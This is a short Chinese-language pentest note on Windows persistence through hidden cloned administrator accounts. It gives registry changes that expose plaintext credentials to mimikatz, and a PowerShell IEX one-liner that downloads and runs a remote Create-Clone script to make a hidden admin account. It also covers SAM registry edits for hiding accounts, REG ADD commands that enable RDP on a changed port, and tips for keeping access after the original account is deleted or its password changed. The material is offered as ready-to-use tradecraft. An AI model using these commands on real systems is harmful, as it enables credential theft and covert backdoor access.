Powershell-Clone-Account
Contents
0x00 Server2012抓不到明文
From:Evi1cg + 3gstudent
HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的
UseLogonCredential设置为1,DWORD为32,
重启后就可以抓取了
使用mimikatz.exe,执行ts::multirdp允许多用户远程登录
ps:该方法在系统重启后失效,下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改
https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1
1
|
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1'); Create-Clone -u evi1ox$ -p Test@123 -cu administrator |
0x01 3gstudent的奇淫技巧
删除注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ 下对应帐户的键值(共有两处)
HKEY_LOCAL_MACHINE\SAM\SAM\* [1 17]
注意:
*代表枚举所有子键
1代表Administrators 完全访问
17代表System 完全访问
1、复制管理员帐户Administrator
需要注意管理员帐户是否被禁用,如果被禁用,那么克隆出的隐藏帐户也是被禁用状态
2、复制已有帐户
在3389远程登录的利用上存在相同帐户的冲突关系
通过cmd开启本机的3389远程登录功能:
1 2 |
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f |
利用以上方法,克隆帐户a的权限,建立隐藏帐户aaa$
如果系统当前登录帐号为a,那么使用隐藏帐户aaa$登录的话,会系统被识别为帐户a,导致帐户a下线
3、新建帐户再复制
进一步,大胆的思考
新建管理员帐户b,克隆帐户b,建立隐藏账户bbb$
删除管理员帐户b,隐藏账户bbb$仍然有效
4、原帐户的维持
再进一步
克隆帐户a的权限,建立隐藏帐户aaa$
修改帐户a的密码,隐藏帐户aaa$仍然有效